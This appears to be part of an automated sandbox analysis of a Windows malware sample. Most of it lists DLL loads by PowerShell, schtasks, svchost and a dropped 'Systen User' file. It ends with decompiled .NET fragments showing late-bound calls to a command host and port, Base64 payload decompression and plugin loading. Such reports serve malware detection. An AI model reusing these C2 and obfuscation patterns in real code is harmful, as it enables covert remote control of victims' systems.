                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Systen UserSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                            Source: Systen User.lnk.2.drLNK file: ..\..\..\..\..\Systen User
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: ozgpPwVAu1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: ozgpPwVAu1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            Source: adawsfaefasfasfg.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: adawsfaefasfasfg.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: adawsfaefasfasfg.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: wasdwasfwasfs.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: wasdwasfwasfs.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: wasdwasfwasfs.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Systen User.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Systen User.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Systen User.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: adawsfaefasfasfg.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
